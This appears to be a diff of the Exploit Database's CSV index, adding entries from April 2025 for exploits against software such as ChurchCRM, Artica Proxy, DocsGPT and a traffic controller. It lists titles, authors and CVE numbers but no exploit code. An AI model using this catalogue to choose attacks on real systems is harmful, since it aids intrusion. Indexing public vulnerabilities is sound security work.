37110,exploits/java/webapps/37110.py,"Apache JackRabbit - WebDAV XML External Entity",2015-05-26,"Mikhail Egorov",webapps,java,8080,2015-05-26,2017-11-02,0,CVE-2015-1833;OSVDB-122382,,,,,
|
||||
45673,exploits/java/webapps/45673.py,"Apache OFBiz 16.11.04 - XML External Entity Injection",2018-10-24,"Jamie Parfet",webapps,java,,2018-10-24,2018-10-25,0,,"XML External Entity (XXE)",,,,
|
||||
48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java,,2020-05-01,2020-05-01,0,CVE-2019-0235,,,,,
|
||||
|
@ -11991,6 +11992,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",2021-01-05,MoeAlBarbari,webapps,multiple,,2021-01-05,2021-01-05,0,CVE-2020-29597,,,,,
|
||||
48693,exploits/multiple/webapps/48693.go,"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution",2020-07-26,"Patrick Hener",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2020-15492,,,,,
|
||||
34408,exploits/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - Cross-Site Request Forgery",2014-08-25,"Rainer Giedat",webapps,multiple,80,2014-08-25,2014-08-25,0,CVE-2014-5335;OSVDB-110269,,,,,
|
||||
52151,exploits/multiple/webapps/52151.txt,"Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)",2025-04-09,"Andrew Lemon/Red Threat",webapps,multiple,,2025-04-09,2025-04-09,0,CVE-2024-38944,,,,,
|
||||
14004,exploits/multiple/webapps/14004.txt,"Interscan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65973,,cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf,,,
|
||||
14001,exploits/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65774,,cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf,,,
|
||||
49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,,2020-12-03,2021-01-06,0,CVE-2020-29477,,,,,
|
||||
|
@ -12452,6 +12454,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
50233,exploits/multiple/webapps/50233.py,"ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"numan türle",webapps,multiple,,2021-08-30,2021-08-30,0,,,,,,
|
||||
46895,exploits/multiple/webapps/46895.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting",2019-05-22,Vingroup,webapps,multiple,,2019-05-22,2019-05-22,0,CVE-2019-12189,,,http://www.exploit-db.com/screenshots/idlt47000/1.jpg,,
|
||||
46894,exploits/multiple/webapps/46894.txt,"Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions",2019-05-22,Vingroup,webapps,multiple,,2019-05-22,2019-05-22,0,CVE-2019-12252,,,,,
|
||||
52148,exploits/multiple/webapps/52148.txt,"Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege",2025-04-09,"Metin Yunus Kandemir",webapps,multiple,,2025-04-09,2025-04-09,0,CVE-2024-24409,,,,,https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
|
||||
46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple,,2019-05-03,2019-05-03,0,CVE-2019-11504,,,,http://www.exploit-db.comzotonic-0.46.0.zip,
|
||||
22490,exploits/multiple/webapps/22490.txt,"ZPanel 10.0.1 - Cross-Site Request Forgery / Cross-Site Scripting / SQL Injection / Password Reset",2012-11-05,pcsjj,webapps,multiple,,2012-11-05,2012-11-07,1,CVE-2012-5686;CVE-2012-5685;CVE-2012-5684;CVE-2012-5683;OSVDB-87142;OSVDB-87141;OSVDB-87140;OSVDB-87139,,,,http://www.exploit-db.comzpanelx-1_0_0.zip,
|
||||
35012,exploits/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",webapps,multiple,,2010-11-23,2014-10-20,1,,,,,,https://www.securityfocus.com/bid/45027/info
|
||||
|
@ -14123,6 +14126,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
|
||||
5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
|
||||
48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
|
||||
52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-37732,,,,,
|
||||
37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
|
||||
26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
|
||||
27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
|
||||
|
@ -14285,6 +14289,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
51215,exploits/php/webapps/51215.txt,"Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-28,1,CVE-2023-23162,,,,,
|
||||
51216,exploits/php/webapps/51216.txt,"Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-28,1,CVE-2023-23163,,,,,
|
||||
34560,exploits/php/webapps/34560.html,"ArtGK CMS - Cross-Site Scripting / HTML Injection",2010-09-01,"High-Tech Bridge SA",webapps,php,,2010-09-01,2014-09-08,1,,,,,,https://www.securityfocus.com/bid/42923/info
|
||||
52146,exploits/php/webapps/52146.py,"Artica Proxy 4.50 - Remote Code Execution (RCE)",2025-04-09,Madan,webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-2054,,,,,
|
||||
43206,exploits/php/webapps/43206.txt,"Artica Web Proxy 3.06 - Remote Code Execution",2017-12-01,hyp3rlinx,webapps,php,,2017-12-01,2017-12-01,0,CVE-2017-17055,,,,,
|
||||
31028,exploits/php/webapps/31028.txt,"Article Dashboard - '/admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,webapps,php,,2008-01-15,2014-01-19,1,CVE-2008-0286;OSVDB-40273,,,,,https://www.securityfocus.com/bid/27286/info
|
||||
4221,exploits/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,webapps,php,,2007-07-23,,1,OSVDB-39107;CVE-2007-4007,,,,,
|
||||
|
@ -15788,6 +15793,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,,
|
||||
50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,,
|
||||
51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
|
||||
52152,exploits/php/webapps/52152.NA,"ChurchCRM 5.9.1 - SQL Injection",2025-04-09,"Sanan Qasimzada",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-39304,,,,,
|
||||
51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
|
||||
51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
|
||||
15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
|
||||
|
@ -28677,6 +28683,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
8095,exploits/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php,,2009-02-22,,1,,,,,,
|
||||
29632,exploits/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php,,2007-02-22,2017-02-14,1,CVE-2007-1152;OSVDB-37398,,,,,https://www.securityfocus.com/bid/22667/info
|
||||
26018,exploits/php/webapps/26018.txt,"Pyrox Search 1.0.5 - 'Newsearch.php' Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,webapps,php,,2005-07-21,2013-06-08,1,,,,,,https://www.securityfocus.com/bid/14343/info
|
||||
52153,exploits/php/webapps/52153.NA,"PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)",2025-04-09,"Vuln Seeker Cybersecurity Team",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-6244,,,,,
|
||||
8031,exploits/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,webapps,php,,2009-02-09,2017-02-08,1,,,,,,
|
||||
26600,exploits/php/webapps/26600.txt,"Q-News 2.0 - Remote File Inclusion",2005-11-26,[GB],webapps,php,,2005-11-26,2013-07-05,1,CVE-2005-3859;OSVDB-21137,,,,,https://www.securityfocus.com/bid/15576/info
|
||||
16116,exploits/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Information Disclosure",2011-02-05,"Daniel Godoy",webapps,php,,2011-02-05,2011-02-05,1,,,,,,
|
||||
|
@ -29037,6 +29044,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
52133,exploits/php/webapps/52133.txt,"Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)",2025-04-06,"Ilteris Kaan Pehlivan",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-9458,,,,,
|
||||
43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5705,,,,,
|
||||
48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,,2020-06-30,2020-06-30,0,,,,,,
|
||||
52150,exploits/php/webapps/52150.NA,"ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)",2025-04-09,"Jeremia Geraldi Sihombing",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-39143,,,,,
|
||||
35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php,,2014-12-15,2014-12-15,0,OSVDB-115821;OSVDB-115820;OSVDB-115819;OSVDB-115818,,,,,
|
||||
46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80,2019-01-28,2019-01-28,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comResourceSpace_8_6_12117.zip,
|
||||
46308,exploits/php/webapps/46308.txt,"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection",2019-02-04,dd_,webapps,php,80,2019-02-04,2019-02-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comResourceSpace_8_6_12117.zip,
|
||||
|
@ -35043,6 +35051,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
|
||||
50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
|
||||
51992,exploits/python/webapps/51992.py,"djangorestframework-simplejwt 5.3.1 - Information Disclosure",2024-04-15,"Dhrumil Mistry",webapps,python,,2024-04-15,2024-04-15,0,CVE-2024-22513,,,,,
|
||||
52145,exploits/python/webapps/52145.py,"DocsGPT 0.12.0 - Remote Code Execution",2025-04-09,"Shreyas Malhotra",webapps,python,,2025-04-09,2025-04-09,1,CVE-2025-0868,,,,,
|
||||
51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,,
|
||||
49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
|
||||
52076,exploits/python/webapps/52076.py,"Invesalius3 - Remote Code Execution",2024-08-28,"Alessio Romano (sfoffo)_ Riccardo Degli Esposti (partywave)",webapps,python,,2024-08-28,2024-08-28,0,,,,,,
|
||||
|
|